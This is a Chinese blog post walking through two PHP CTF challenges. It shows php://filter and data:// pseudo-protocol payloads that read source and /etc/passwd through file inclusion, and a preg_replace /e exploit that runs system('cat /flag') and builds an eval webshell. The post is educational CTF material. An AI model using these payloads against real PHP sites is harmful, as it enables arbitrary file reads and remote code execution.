PHP伪协议

已于 2023-04-09 15:32:07 修改
阅读量1.0k 收藏 3
点赞数 2
文章标签: php 开发语言
于 2023-04-02 17:25:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75178803/article/details/129912096
版权

php伪协议的相关知识点:

[php知识点]PHP伪协议_Landasika的博客-CSDN博客
PHP伪协议总结 - 个人文章 - SegmentFault 思否

PHP伪协议_H0ne的博客-CSDN博客

PHP伪协议详解_Snakin_ya的博客-CSDN博客

php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行,从而导致任意文件读取

file://伪协议 (读取文件内容)

通过file协议可以访问本地文件系统,读取到文件的内容,并且不受allow_url_fopen,allow_url_include影响
file://协议主要用于访问文件(绝对路径、相对路径以及网络路径)
比如:http://www.xx.com?file=file:///etc/passsword
 

协议参数:

常用的有

php://filter/read=convert.base64-encode/resource=index.php
php://filter/resource=index.php

[BSidesCF 2020]Had a bad day

在注入点后加上

php://filter/resource=index.php

 存在文件包含漏洞

去掉php,因为这个源码里会自动给加一个.php

即加上

php://filter/resource=index

出现这样的结果,我们可以换个加密语句

 换为:

php://filter/read=convert.base64-encode/resource=index

 因为我们采用了base64加密,将出现的内容复制进行解密

<html>
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="description" content="Images that spark joy">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0">
    <title>Had a bad day?</title>
    <link rel="stylesheet" href="css/material.min.css">
    <link rel="stylesheet" href="css/style.css">
  </head>
  <body>
    <div class="page-layout mdl-layout mdl-layout--fixed-header mdl-js-layout mdl-color--grey-100">
      <header class="page-header mdl-layout__header mdl-layout__header--scroll mdl-color--grey-100 mdl-color-text--grey-800">
        <div class="mdl-layout__header-row">
          <span class="mdl-layout-title">Had a bad day?</span>
          <div class="mdl-layout-spacer"></div>
        <div>
      </header>
      <div class="page-ribbon"></div>
      <main class="page-main mdl-layout__content">
        <div class="page-container mdl-grid">
          <div class="mdl-cell mdl-cell--2-col mdl-cell--hide-tablet mdl-cell--hide-phone"></div>
          <div class="page-content mdl-color--white mdl-shadow--4dp content mdl-color-text--grey-800 mdl-cell mdl-cell--8-col">
            <div class="page-crumbs mdl-color-text--grey-500">
            </div>
            <h3>Cheer up!</h3>
              <p>
                Did you have a bad day? Did things not go your way today? Are you feeling down? Pick an option and let the adorable images cheer you up!
              </p>
              <div class="page-include">
              <?php
				$file = $_GET['category'];

				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
				?>
			</div>
          <form action="index.php" method="get" id="choice">
              <center><button onclick="document.getElementById('choice').submit();" name="category" value="woofers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Woofers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button>
              <button onclick="document.getElementById('choice').submit();" name="category" value="meowers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Meowers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button></center>
          </form>

          </div>
        </div>
      </main>
    </div>
    <script src="js/material.min.js"></script>
  </body>
</html>

 找到index.php

 传入的category参数必须有woofers,meowers,index才行

输入

woofers/../flag

 

后查看源代码,看见源代码里有提示flag

那如何去获取flag.php的内容呢

这里使用的知识点是php://filter伪协议套协议

输入

/index.php?category=php://filter/convert.base64-encode/index/resource=flag

得到如下页面

 复制进行解码得到flag

 php伪协议相关知识点

 https://www.cnblogs.com/wjrblogs/p/12285202.html

preg_replace远程代码执行

代码审计Day8 - preg_replace函数之命令执行 - 知乎

深入研究preg_replace与代码执行 - 先知社区

 老洞新姿势,记一次漏洞挖掘和利用(PHPMailer RCE) - 先知社区

https://www.cnblogs.com/dhsx/p/4991983.html

 preg_replace函数

PHP: preg_replace - Manual

[BJDCTF2020]ZJCTF,不过如此

查看题目为:

通过分析代码可知,GET传入两个参数text和file,test参数利用file_get_contents()参数只读形式打开,打开内容要和I have a dream 字符串内容相匹配,才能执行下面的文件包含$file参数,用file_get_contents()打开$text参数,以及下面的文件包含函数,则我们可以用php伪协议中的data://协议用filter协议去读下next.php的源码

php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行,从而导致任意文件读取

file://伪协议 (读取文件内容)

通过file协议可以访问本地文件系统,读取到文件的内容

data://(读取文件)

和php伪协议的input类似,碰到file_get_contents()来用

 输入以下代码

index.php?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php

 得到以下界面,复制去base64解码得到

 解密得到以下代码

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

 在代码中发现PHP preg_replace()函数

相关笔记链接:深入研究preg_replace与代码执行 - 先知社区

 PHP preg_replace() 函数

preg_replace — 执行一个正则表达式的搜索和替换

 固定解题模式:

 \S*=${}

 输入以下代码

next.php?\S*=${getFlag()}&cmd=system('cat /flag');

 直接得到flag

或者

也可以用preg_replace()函数的代码执行构造出一个一句话木马用蚁剑连接找flag

\next.php?\S*=${eval($_[POST[cmd])};

在根目录下找到flag

参考wp有

[BJDCTF2020]ZJCTF,不过如此_penson by 小乌的博客-CSDN博客

[BJDCTF2020]ZJCTF,不过如此1_十九不瞌睡的博客-CSDN博客

BUUCTF [BJDCTF2020]ZJCTF,不过如此_suppose18的博客-CSDN博客

访白鹿
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP伪协议学习总结
不想当脚本小子的脚本小子
12-01 495
今天工作中遇到了一个利于curl来伪装POST传参的方法(这里给大家一个思路,当你觉得利用get传参行不通的时候,不妨试试post传参),其中用到了php伪协议,我对这一块不太了解,只是在学习文件包含漏洞的时候用到了file://这种本地文件包含,在这里我打算系统的学习并且总结一下,也方便了自己日后复习。 首先,php伪协议有以下几种(我觉得很多东西是要记在脑子里的): file:// — 访问本地文件系统 http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s...
Web安全之PHP伪协议漏洞利用,以及伪协议漏洞防护方法
Scalzdp的专栏
11-13 1613
单纯看伪协议利用与之前的文件包含漏洞及其相似,但是在真实环境中是对用户输入进行了过滤替换的,在使用漏洞就需要不断考虑如何绕过这些过滤条件。只要我们开发过程中对于使用了伪协议这些函数的时候,一定要严格对用户参数进行过滤,避免一时偷懒导致服务器被黑,其实最终难逃其就。如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵。
PHP反序列化
qq_51175992的博客
07-13 49
就可以构造我们的序列化字符串,使得$password等于我们构造的字符串,然后$password = unserialize($password)将我们构造好的序列化字符串还原成class Flag对象。总结:这道题考察的点其实还是对于代码的敏感度,碰到了file_get_contents()之类的要想到PHP伪协议中相对应的协议,在看到有注释的内容时一定要重点关注,一般都是解题的方向。它是在直接输出对象引用时自动调用的方法,又正好有unserialize(),那就存在反序列化漏洞!
PHP伪协议详解
逍遥小哥的博客
02-27 1045
require() // 只在执行到此函数时才去包含文件,若包含的文件不存在产生警告,程序继续运行 require_once() // 如果一个文件已经被包含过,则不会在包含它 include() // 程序一运行文件便会包含进来,若包含文件不存在产生致命错误,程序终止运行。php:// 访问各个输入/输出流(I/O streams),在CTF中经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。
PHP中的伪协议】讲解
cz88888888666的博客
03-12 458
PHP中的伪协议(也称为流包装协议)是一种特殊的流封装机制,允许你访问不同类型的资源,如文件、网络资源、压缩文件内容等,通过一个统一的接口。在某些情况下,你可以通过上下文(stream context)来定制或修改默认行为,例如传递额外的头信息给HTTP封装器,或者控制超时、代理、请求方法等。需要注意的是,并不是所有的PHP安装都支持所有的流包装协议,可用的流封装器依赖于PHP的配置以及安装的扩展。- 用于读取数据,如你可以使用data协议嵌入图片数据或其他文件类型的数据直接在你的脚本中。
PHP伪协议精讲(文件包含漏洞)
2301_76251460的博客
07-21 579
PHP伪协议
PHP 伪协议
m0_56107268的博客
11-08 5222
php伪协议
[php知识点]PHP伪协议
Landasika的博客
05-17 7864
目录 一、前言1、什么是PHP伪协议2、什么时候用PHP伪协议include和require函数include和include_once的区别(require与require_once的区别)highlight_file()和show_source()readfile和file_get_contents和filefile_put_contentsfopen二、PHP伪协议file://...
php伪协议
weixin_60719780的博客
01-27 3863
PHP伪协议,也是php支持的协议和封装协议。file:// 访问本地文件系统php:// 访问各个输入/输出流data:// 数据zip:// 压缩流 不过有些伪协议需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件。
php伪协议概述.pdf
02-24
PHP伪协议是一种特殊的URL协议,用于在PHP中进行文件操作。它允许在URL中指定文件路径,并通过内置的PHP函数来访问和操作文件内容。
php伪协议.zipphp伪协议.zip
02-24
php伪协议php伪协议.zipphp伪协议.zip
php伪协议.pdfphp伪协议.pdfphp伪协议.pdf
02-24
php伪协议php伪协议.pdfphp伪协议.pdf
php伪协议的解释.txt
02-24
php伪协议
php开发工程师系统性教学】——Laravel框架(验证码)的配置和使用的保姆式教程
php优质创造者
04-21 1606
👨‍💻。
spdlog 日志库部分源码说明——让你可以自定义的指定自动切换日志时间
ALex_zry的博客
04-22 468
针对 网络上spdlog日志库目前存在的使用方式固定,不能发挥这个库本身应有价值的情况,这里对一些支持场景进行说明,以供初学者省去阅读源码的时间,直接上手使用。
webman 事务回滚失效问题记录
juan9872的博客
04-21 706
webman是一款基于workerman开发的高性能HTTP服务框架。webman用于替代传统的php-fpm架构,提供超高性能可扩展的HTTP服务。你可以用webman开发网站,也可以开发HTTP接口或者微服务。除此之外,webman还支持自定义进程,可以做workerman能做的任何事情,例如websocket服务、物联网、游戏、TCP服务、UDP服务、unix socket服务等等。
Laravel 6 - 第十五章 验证器
最新发布
逆旅岁月的博客
04-22 1466
用于验证输入数据是否符合特定规则的一个组件,Laravel 6 提供了一个简洁且强大的验证系统,可以轻松验证来自用户输入或其他来源的数据。
php伪协议常用代码
08-05
常用的PHP伪协议代码包括: 1. 使用php://input执行PHP代码:这种方法可以通过将PHP代码作为POST数据传递,然后使用php://input伪协议来执行代码。例如,可以使用以下代码来执行phpinfo()函数并将结果输出到页面上...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值